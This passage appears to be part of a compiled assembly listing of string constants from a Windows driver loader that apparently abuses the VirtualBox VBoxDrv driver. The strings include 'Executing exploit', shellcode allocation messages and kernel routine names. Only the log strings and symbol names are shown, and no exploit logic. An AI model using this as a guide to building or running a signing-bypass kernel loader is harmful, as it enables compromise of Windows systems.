??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ CONST SEGMENT ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'r', 00H, 'i' DB 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B' DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'o', 00H, 'n', 00H, ' ', 00H DB 'd', 00H, 'i', 00H, 's', 00H, 'k', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ CONST SEGMENT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ DB '\' DB 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H DB 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D' DB 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y', 00H, 's', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ CONST SEGMENT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'i', 00H DB 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o' DB 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k' DB 00H, 'u', 00H, 'p', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'n', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 
00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'i', 00H DB 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't' DB 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r' DB 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H DB 'p', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v' DB 00H, ',', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'n', 00H, 'n', 00H DB 'o', 00H, 't', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'n', 00H, 't' DB 00H, 'i', 00H, 'n', 00H, 'u', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't' DB 00H, 'L', 00H, 'w', 00H, 'f', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ CONST SEGMENT 
??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H DB 'L', 00H, 'w', 00H, 'f', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't' DB 00H, 'A', 00H, 'd', 00H, 'p', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ CONST SEGMENT ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'N', 00H, 'e', 00H, 't', 00H DB 'A', 00H, 'd', 00H, 'p', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B' DB 00H, 'M', 00H, 'o', 00H, 'n', 00H, ',', 00H, ' ', 00H, 'c', 00H DB 'a', 00H, 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'c' DB 00H, 'o', 00H, 'n', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'u', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; 
COMDAT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ CONST SEGMENT ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ DB 'V' DB 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'U', 00H, 'S', 00H, 'B', 00H DB 'M', 00H, 'o', 00H, 'n', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ CONST SEGMENT ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'A', 00H, 'c', 00H DB 't', 00H, 'i', 00H, 'v', 00H, 'e', 00H, ' ', 00H, 'V', 00H, 'i' DB 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H DB 'o', 00H, 'x', 00H, ' ', 00H, 'f', 00H, 'o', 00H, 'u', 00H, 'n' DB 00H, 'd', 00H, ' ', 00H, 'i', 00H, 'n', 00H, ' ', 00H, 's', 00H DB 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, ',', 00H, ' ' DB 00H, 'a', 00H, 't', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'p', 00H DB 't', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o', 00H, 'p', 00H, ' ' DB 00H, '(', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, ')', 00H, ' ', 00H, 'i', 00H, 't', 00H, ' ', 00H, 'd' DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 's', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ CONST SEGMENT ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ DB '\', 00H, 'D', 00H DB 'e', 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ CONST SEGMENT ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ DB 'V', 00H, 'B', 00H DB 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ CONST SEGMENT 
??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'o', 00H, 'p', 00H, 'e' DB 00H, 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'S', 00H DB 'C', 00H, 'M', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H, 'a' DB 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ CONST SEGMENT ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a' DB 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B' DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H DB 'v', 00H, 'e', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'G', 00H, 'e' DB 00H, 't', 00H, 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H DB 'm', 00H, 'D', 00H, 'i', 00H, 'r', 00H, 'e', 00H, 'c', 00H, 't' DB 00H, 'o', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'f', 00H, 'a', 00H DB 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H DB 'e', 00H, 'c', 00H, 'u', 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'e', 00H, 'x', 00H, 'p', 00H, 'l', 00H, 'o', 00H DB 'i', 00H, 't', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT 
??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'R', 00H, 'e', 00H DB 's', 00H, 'o', 00H, 'l', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'k', 00H, 'e', 00H, 'r', 00H, 'n', 00H, 'e', 00H DB 'l', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'p', 00H, 'o', 00H, 'r' DB 00H, 't', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ CONST SEGMENT ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, '1' DB 00H, '0', 00H, ' ', 00H, 'R', 00H, 'S', 00H, '2', 00H, '+', 00H DB ' ', 00H, 'b', 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't' DB 00H, 'r', 00H, 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, ' ', 00H, 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H DB 't', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ CONST SEGMENT ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H DB 'f', 00H, 'a', 00H, 'u', 00H, 'l', 00H, 't', 00H, ' ', 00H, 'b' DB 00H, 'o', 00H, 'o', 00H, 't', 00H, 's', 00H, 't', 00H, 'r', 00H DB 'a', 00H, 'p', 00H, ' ', 00H, 's', 00H, 'h', 00H, 'e', 00H, 'l' DB 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H DB 's', 00H, 'e', 00H, 'l', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e' DB 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ CONST SEGMENT 
??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H DB 'a', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't' DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ CONST SEGMENT ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'u', 00H, 'n' DB 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 't', 00H DB 'o', 00H, ' ', 00H, 'a', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c' DB 00H, 'a', 00H, 't', 00H, 'e', 00H, ' ', 00H, 's', 00H, 'h', 00H DB 'e', 00H, 'l', 00H, 'l', 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e' DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ CONST SEGMENT ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'Z', 00H, 'w', 00H DB 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ CONST SEGMENT ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'Z', 00H, 'w' DB 00H, 'C', 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 
'e', 00H, 's', 00H, 's' DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_07IPICGNAN@ZwClose@ CONST SEGMENT ??_C@_07IPICGNAN@ZwClose@ DB 'ZwClose', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ CONST SEGMENT ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'P', 00H, 's', 00H DB 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H, 'S' DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T', 00H DB 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ CONST SEGMENT ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'P', 00H, 's' DB 00H, 'C', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 't', 00H, 'e', 00H DB 'S', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, 'T' DB 00H, 'h', 00H, 'r', 00H, 'e', 00H, 'a', 00H, 'd', 00H, ' ', 00H DB 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's', 00H, 's' DB 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'f', 00H DB 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ CONST SEGMENT ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ DB 'PsCreateSystemThread', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ CONST SEGMENT ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ DB 'L' DB 00H, 'd', 00H, 
'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'x', 00H DB 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H, 't' DB 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W', 00H DB 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H, ' ' DB 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ CONST SEGMENT ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ',', 00H, ' ', 00H, 'E', 00H, 'x' DB 00H, 'A', 00H, 'l', 00H, 'l', 00H, 'o', 00H, 'c', 00H, 'a', 00H DB 't', 00H, 'e', 00H, 'P', 00H, 'o', 00H, 'o', 00H, 'l', 00H, 'W' DB 00H, 'i', 00H, 't', 00H, 'h', 00H, 'T', 00H, 'a', 00H, 'g', 00H DB ' ', 00H, 'a', 00H, 'd', 00H, 'd', 00H, 'r', 00H, 'e', 00H, 's' DB 00H, 's', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ CONST SEGMENT ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ DB 'ExAllocatePoolWithTag', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ CONST SEGMENT ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'n', 00H, 't', 00H DB 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H, '.' 
